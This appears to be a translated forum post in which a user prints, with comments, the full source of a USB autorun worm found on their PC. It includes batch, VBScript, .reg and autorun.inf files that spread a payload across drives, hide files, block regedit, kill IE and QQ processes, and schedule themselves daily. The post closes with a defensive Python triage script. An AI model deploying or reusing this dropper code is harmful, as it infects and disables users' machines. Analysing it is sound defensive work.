Virus source code and its after-effects --- hoping a master can crack it

I have two hard drives: one with XP, the other with Vista just installed. A friend used my computer for a while, and a virus spread from his USB stick to my computer. I found the virus was not packed, so I extracted it and looked inside. In the end it comes down to these six files: autorun.inf, cmd.vbs, hiden.reg, ie.vbs, qq.vbs, terrible.bat, compressed with RAR into a self-extracting archive; as soon as someone runs it, they are infected. I opened them in Notepad; the code is as follows:

autorun.inf
[AutoRun]
open=hitler314.exe
shell\open=打开(&O)
shell\open\Command=hitler314
shell\explore=资源管理器(&X)
shell\explore\Command="hitler314 -e"
cmd.vbs
' Launches terrible.bat in a hidden window (window style 0 = no console shown)
Set shell = Wscript.createobject("wscript.shell")
a = shell.run ("terrible.bat",0)
hiden.reg
Windows Registry Editor Version 5.00
; Deletes Explorer's "Show hidden files and folders" CheckedValue (normally a DWORD) ...
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=-
; ... then re-creates it as a string, so the setting no longer takes effect
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"="0x00000000"
; Blocks regedit for the current user
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
ie.vbs
' Endless loop: query WMI on the local machine (".") for every IEXPLORE.EXE
' process, terminate it, sleep 1 ms, repeat
dim bag,pipe,honker,good
do
good="."
set bag=getobject("winmgmts:\\"&good&"\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name='IEXPLORE.EXE'")
for each i in pipe
i.terminate()
next
wscript.sleep 1
loop
qq.vbs
' Same loop as ie.vbs, but kills every QQ.exe process instead
dim bag,pipe,honker,good
do
good="."
set bag=getobject("winmgmts:\\"&good&"\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name='QQ.exe'")
for each i in pipe
i.terminate()
next
wscript.sleep 1
loop
terrible.bat
@rem Apply the registry changes from hiden.reg silently
@regedit.exe /s hiden.reg
@rem Create a folder named only with dots on drives D: to O: to hold the payload
@mkdir d:\.......\
@mkdir e:\.......\
@mkdir f:\.......\
@mkdir g:\.......\
@mkdir h:\.......\
@mkdir i:\.......\
@mkdir j:\.......\
@mkdir k:\.......\
@mkdir l:\.......\
@mkdir m:\.......\
@mkdir n:\.......\
@mkdir o:\.......\
@rem Drop autorun.inf in the root of every drive so the payload launches when the drive is opened
@copy autorun.inf d:\
@copy autorun.inf e:\
@copy autorun.inf f:\
@copy autorun.inf g:\
@copy autorun.inf h:\
@copy autorun.inf i:\
@copy autorun.inf j:\
@copy autorun.inf k:\
@copy autorun.inf l:\
@copy autorun.inf m:\
@copy autorun.inf n:\
@copy autorun.inf o:\
@rem Copy the payload executable into the dot folders
@copy hitler314.exe d:\.......\
@copy hitler314.exe e:\.......\
@copy hitler314.exe f:\.......\
@copy hitler314.exe g:\.......\
@copy hitler314.exe h:\.......\
@copy hitler314.exe i:\.......\
@copy hitler314.exe j:\.......\
@copy hitler314.exe k:\.......\
@copy hitler314.exe l:\.......\
@copy hitler314.exe m:\.......\
@copy hitler314.exe n:\.......\
@copy hitler314.exe o:\.......\
@rem Litter the drives with junk folders whose names end in ".."
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1..\
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!2..\
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!3..\
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!4..\
@md d:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!5..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!59..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!60..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!61..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!62..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!63..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!64..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!65..\
@md e:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!66..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!48..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!49..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!50..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!51..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!52..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!53..\
@md h:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!54..\
@md i:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!78..\
@md i:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!79..\
@md i:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!80..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!54..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!55..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!56..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!57..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!58..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!59..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!60..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!61..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!94..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!95..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!96..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!97..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!98..\
@md j:\!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!99..\
@rem Start the two process-killer scripts (expected at d:\)
@d:\ie.vbs
@d:\qq.vbs
@rem Delete the dropper's own files from the current folder
@del hitler314.exe /f /q
@del ie.vbs /f /q
@del qq.vbs /f /q
@del hiden.reg /f /q
@del cmd.vbs /f /q
@rem Schedule cmd.vbs from the dot folders to run every day with the at service
at 21:00 /every:M,T,W,Th,F,S,Su d:\.......\cmd.vbs
at 19:00 /every:M,T,W,Th,F,S,Su e:\.......\cmd.vbs
at 22:00 /every:M,T,W,Th,F,S,Su f:\.......\cmd.vbs
at 23:00 /every:M,T,W,Th,F,S,Su g:\.......\cmd.vbs
at 16:00 /every:M,T,W,Th,F,S,Su h:\.......\cmd.vbs
@rem shutdown.bat is not among the six files listed above
@shutdown.bat
cls
I can only make sense of the last file and the registry file; I cannot understand the others. Would a master please decipher them!
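As an added example (not code from the post or its author), here is a small Python triage script that reads an autorun.inf and a .reg file as text and reports the indicators visible in the files above: the open= and shell\...\Command entries that launch the payload when a drive is opened, the SHOWALL CheckedValue being deleted and re-created as a string, and DisableRegistryTools being set. The function names and the constructed sample inputs are my own; to use it on a suspect drive, read the copied files and pass their contents to triage().

```python
"""Triage helper for autorun-style droppers (added example, not from the post).

Parses an autorun.inf and a .reg file as plain text and lists the indicators
the post's files exhibit. The sample inputs are constructed to mirror the
files quoted above; they were not read from a real drive.
"""
import re
from typing import Dict, List, Tuple

# Registry keys that the post's hiden.reg touches (paths as on the page)
SHOWALL_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
               r"\Explorer\Advanced\Folder\Hidden\SHOWALL")
POLICY_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"

# Constructed samples mirroring the post's autorun.inf and hiden.reg
SAMPLE_AUTORUN = r"""[AutoRun]
open=hitler314.exe
shell\open=打开(&O)
shell\open\Command=hitler314
shell\explore=资源管理器(&X)
shell\explore\Command="hitler314 -e"
"""
SAMPLE_REG = f"""Windows Registry Editor Version 5.00
[{SHOWALL_KEY}]
"CheckedValue"=-
[{SHOWALL_KEY}]
"CheckedValue"="0x00000000"
[{POLICY_KEY}]
"DisableRegistryTools"=dword:00000001
"""

# One .reg value line: "name"=data  (data may be -, "string", dword:..., hex:...)
REG_VALUE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')


def parse_autorun(text: str) -> Dict[str, str]:
    """Return key=value pairs of the [AutoRun] section, keys lower-cased."""
    entries: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def autorun_findings(entries: Dict[str, str]) -> List[str]:
    """Flag entries that make Explorer run something when the drive is opened."""
    findings = []
    if "open" in entries:
        findings.append(f"auto-execute on insert/double-click: open={entries['open']}")
    for verb in ("open", "explore"):
        cmd = entries.get(f"shell\\{verb}\\command")
        if cmd:
            findings.append(f"Explorer '{verb}' verb hijacked: {cmd}")
    return findings


def parse_reg(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value_name, data) triples in file order.

    Order matters: hiden.reg deletes CheckedValue and then re-creates it with
    a different type, which only shows up if both operations are kept.
    """
    ops: List[Tuple[str, str, str]] = []
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = REG_VALUE.match(line)
        if m and key is not None:
            ops.append((key, m.group("name"), m.group("data")))
    return ops


def reg_findings(ops: List[Tuple[str, str, str]]) -> List[str]:
    """Flag the two Explorer/regedit tampering patterns from hiden.reg."""
    findings = []
    for key, name, data in ops:
        if key.lower() == SHOWALL_KEY.lower() and name.lower() == "checkedvalue":
            if data == "-":
                findings.append("SHOWALL\\CheckedValue deleted (show-hidden-files toggle removed)")
            elif data.startswith('"'):
                findings.append("SHOWALL\\CheckedValue re-created as REG_SZ, not DWORD (toggle broken)")
        if (key.lower() == POLICY_KEY.lower() and name.lower() == "disableregistrytools"
                and data.lower() == "dword:00000001"):
            findings.append("DisableRegistryTools=1 (regedit blocked for the current user)")
    return findings


def triage(autorun_text: str, reg_text: str) -> List[str]:
    """Combine both parsers into one list of human-readable indicators."""
    return autorun_findings(parse_autorun(autorun_text)) + reg_findings(parse_reg(reg_text))


if __name__ == "__main__":
    for finding in triage(SAMPLE_AUTORUN, SAMPLE_REG):
        print("-", finding)
```

Both parsers are deliberately line-oriented and tolerant of stray whitespace, since files pulled off an infected drive are often edited by hand; an autorun.inf with only an icon= line and a .reg file with only its header produce no findings.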